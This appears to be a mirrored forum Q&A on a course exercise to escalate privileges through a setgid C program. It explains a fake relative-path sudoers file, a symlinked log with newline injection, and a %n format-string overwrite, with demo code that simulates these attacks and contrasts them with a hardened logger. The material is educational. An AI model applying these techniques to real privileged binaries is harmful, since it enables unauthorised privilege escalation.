Exploiting C - Linux setuid and system commands

I have the following code as an executable that I want to exploit for a course in order to spawn a shell with elevated privileges. I am the user levelX and the executable has the setgid bit for levelX+1. I am not allowed to alter any of the code. As I do not have root privileges, setuid(0) fails. I was not able to change the return address of the function or of the main function. Could anyone point me in the right direction?

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int exec(char *command);   /* defined below, called from main before its definition */

int main (int argc, char** argv)
{
  if (argc < 2)
    {
      fprintf(stderr, "usage: %s command\n", argv[0]);
      return -1;
    }
  if (exec(argv[1]) != 0)
    {
      fprintf(stderr, "Cannot execute your command\n");
      return -1;
    }
  return 0;
}

int exec(char *command)
{
  FILE *f = NULL;
  char entry[64];
  char line[256];

  /* relative path: resolved against the caller's current working directory */
  f = fopen("log", "a");
  if (f == NULL)
    {
      fprintf(stderr, "Can't open file\n");
      return -1;
    }
  snprintf(entry, 64, "%d: %s\n", getuid(), command);

  /* entry, which now contains the user-supplied command, is used as the format string */
  fprintf(f, entry, NULL);
  fclose(f);

  /* relative path again: the caller chooses which "sudoers" is read */
  f = fopen("sudoers", "r");
  if (f == NULL)
    {
      fprintf(stderr, "Can't open\n");
      return -1;
    }

  while(fgets(line, 256, f) != NULL)
    {
      if (atoi(line) == getuid())   /* any line starting with the caller's uid matches */
        {
          if (setuid(0) == 0) {
            system(command);
          } else {
            fprintf(stderr, "check permissions\n");
          }

          fclose(f);
          return 0;
        }
    }
  fprintf(stderr, "Error\n");
  fclose(f);
  return -1;
}

From the code you posted, it appears you are supposed to write your own sudoers file in any directory you have write access to, then run this program in that directory so it reads your file.

So, simply write your own UID to this fake sudoers file, and then give a command parameter such as bash to get a shell. There's no need to do any buffer overflow exploitation.

Presumably the real exploitable program has the suid bit set in its file permissions, so it can perform the setuid(0) call. I guess the purpose of the exercise is to demonstrate how all input needs to be sanitized when you are dealing with suid programs, including things like relative paths (which effectively take the current working directory as input), just like any user-supplied paths and other input.


But, since the program only has the setgid bit (as said in a comment), you need to find something you can do with just the group id. That something could be the log file write. You could create a symbolic link with the file name log, pointing to whatever file you want to append to that the group has write permission for. Also, that file needs to have a format such that the appended log line does not corrupt it. Remember, you can put newlines etc. into command line arguments!
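The cwd-relative sudoers trick and the symlink-plus-newline log write described in this answer, as an added example that is not part of the original post or the course's code. It re-implements the posted exec() control flow with the privileged step replaced by a recorder (no setuid/system), stages the attacker's directory under /tmp (the directory name, the target file name and the injected text are constructed for the demo), and contrasts it with a hardened logger that refuses both the symlink and the newline. It runs as any user; the returned bitmask says which checks held.

```c
#define _DEFAULT_SOURCE 1
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed stand-in for the victim's privileged step: instead of
 * setuid(0) + system(command), remember which command would have run. */
static char g_executed[256];

/* Re-implementation of the posted exec() control flow, with the two relative
 * paths ("log", "sudoers") passed in explicitly. Like the original it follows
 * symlinks on the log, copies the command into the log line unescaped and
 * believes whatever "sudoers" says. fprintf(f, entry, NULL) is replaced by
 * fputs(): this block is about the path and newline problems, and fputs keeps
 * the newline injection without the format-string undefined behaviour. */
static int victim_exec(const char *logpath, const char *sudoerspath,
                       unsigned uid, const char *command)
{
    char entry[64], line[256];
    FILE *f = fopen(logpath, "a");
    if (!f) return -1;
    snprintf(entry, sizeof entry, "%u: %s\n", uid, command);
    fputs(entry, f);
    fclose(f);

    f = fopen(sudoerspath, "r");
    if (!f) return -1;
    while (fgets(line, sizeof line, f)) {
        if ((unsigned)atoi(line) == uid) {          /* attacker wrote this file */
            snprintf(g_executed, sizeof g_executed, "%s", command);
            fclose(f);
            return 0;
        }
    }
    fclose(f);
    return -1;
}

/* Attacker side (constructed): in a directory we own, plant a "sudoers" that
 * lists our own uid, make "log" a symlink to a file the victim's group may
 * write, and pass a command whose embedded newline becomes a second log line. */
static const char *k_command = "id\ninjected via symlinked log";

static int run_attack(const char *dir, char *out, size_t outlen)
{
    char sudoers[512], logpath[512], target[512];
    snprintf(sudoers, sizeof sudoers, "%s/sudoers", dir);
    snprintf(logpath, sizeof logpath, "%s/log", dir);
    snprintf(target, sizeof target, "%s/group_writable_target", dir);

    FILE *f = fopen(sudoers, "w");
    if (!f) return -1;
    fprintf(f, "%u\n", (unsigned)getuid());
    fclose(f);
    f = fopen(target, "w");
    if (!f) return -1;
    fputs("# existing contents\n", f);
    fclose(f);
    if (symlink(target, logpath) != 0) return -1;

    if (victim_exec(logpath, sudoers, (unsigned)getuid(), k_command) != 0) return -1;

    f = fopen(target, "r");                     /* what landed in the real file */
    if (!f) return -1;
    size_t n = fread(out, 1, outlen - 1, f);
    out[n] = '\0';
    fclose(f);
    return 0;
}

/* Hardened logger: the caller supplies an absolute path, O_NOFOLLOW makes
 * open() fail on a planted symlink, control characters in the command are
 * rejected so one call appends exactly one line, and the command is always a
 * %s argument, never the format string itself. */
static int safe_log(const char *abs_logpath, unsigned uid, const char *command)
{
    for (const unsigned char *p = (const unsigned char *)command; *p; p++)
        if (*p < 0x20 || *p == 0x7f) return -1;
    int fd = open(abs_logpath, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    FILE *f = fdopen(fd, "a");
    if (!f) { close(fd); return -1; }
    fprintf(f, "%u: %s\n", uid, command);
    return fclose(f) == 0 ? 0 : -1;
}

/* Runs both sides in a fresh scratch directory and returns a bitmask:
 *  1 fake sudoers got the command "executed"   2 injected line reached the target
 *  4 safe_log refused the symlinked "log"      8 safe_log refused the newline
 * 16 safe_log accepted a clean command to a regular file. 31 = all as described. */
int scenario(void)
{
    char tmpl[] = "/tmp/setgid_demo_XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (!dir) return 0;
    char out[1024], logpath[512], safepath[512];
    int bits = 0;
    if (run_attack(dir, out, sizeof out) == 0) {
        if (strcmp(g_executed, k_command) == 0) bits |= 1;
        if (strstr(out, "\ninjected via symlinked log\n")) bits |= 2;
    }
    snprintf(logpath, sizeof logpath, "%s/log", dir);
    snprintf(safepath, sizeof safepath, "%s/safe.log", dir);
    if (safe_log(logpath, (unsigned)getuid(), "id") != 0) bits |= 4;
    if (safe_log(safepath, (unsigned)getuid(), k_command) != 0) bits |= 8;
    if (safe_log(safepath, (unsigned)getuid(), "id") == 0) bits |= 16;
    return bits;
}

int main(void)
{
    printf("scenario bits: %d (31 = all checks passpassed)\n", scenario());
    return 0;
}
```

The symlink defence relies on O_NOFOLLOW failing with ELOOP on the final path component; it does not protect against symlinks in parent directories, which is why the hardened version also insists on an absolute path under a directory the attacker cannot write.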

After all, it was a format string exploit on fprintf(f, entry, NULL); inside int exec(char *command), where you overwrite the return address with the %n format.
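The %n primitive this follow-up refers to, as an added example that is not from the original post: it builds the log entry exactly as exec() does, counts the conversion directives an attacker-controlled command injects into what fprintf(f, entry, NULL) will use as its format, and shows with a legitimate pointer argument what %n stores and how a width field chooses the stored value. It does not reproduce the return-address overwrite itself, which depends on the binary's stack layout and is not given on the page; the uid and commands below are constructed inputs.

```c
#include <stdio.h>
#include <string.h>

/* Counts the conversion directives in a format string ("%%" is a literal
 * percent, not a directive). Each one makes fprintf consume a vararg that
 * nobody supplied: in the posted call only NULL was passed, so the rest come
 * from registers and the stack. */
int count_directives(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        n++;
    }
    return n;
}

/* Builds the entry the same way exec() does, 64-byte buffer included, and
 * reports how many directives the attacker's command smuggled into it. The
 * buffer size matters: "uid: " plus "\n" leaves at most 64 - 1 - strlen(prefix)
 * bytes of format payload before snprintf truncates it. */
int directives_in_entry(unsigned uid, const char *command)
{
    char entry[64];
    snprintf(entry, sizeof entry, "%u: %s\n", uid, command);
    return count_directives(entry);
}

/* What %n does, with a real int pointer as its argument: it stores the
 * number of bytes emitted so far. "%20s" pads "pad" to 20 bytes, so the
 * stored value is 20. In the vulnerable call the pointer is whatever
 * garbage the next vararg slot holds, which turns %n into an arbitrary
 * write once an attacker can place an address there. */
int n_directive_demo(void)
{
    char sink[64];
    int written = -1;
    snprintf(sink, sizeof sink, "%20s%n", "pad", &written);
    return written;
}

/* Choosing the value: the byte count before %n is under the attacker's
 * control, so a width field makes %n store an arbitrary number. Limited
 * here to sink's size; value must be at least 1 for %c. */
int write_value_via_n(int value)
{
    char sink[4096];
    int stored = -1;
    if (value < 1 || value >= (int)sizeof sink) return -1;
    snprintf(sink, sizeof sink, "%*c%n", value, 'X', &stored);
    return stored;
}
```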

Notice: the technical posts on this site are published under the CC BY-SA 4.0 license; if you repost, please cite this site or the original URL. Questions: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM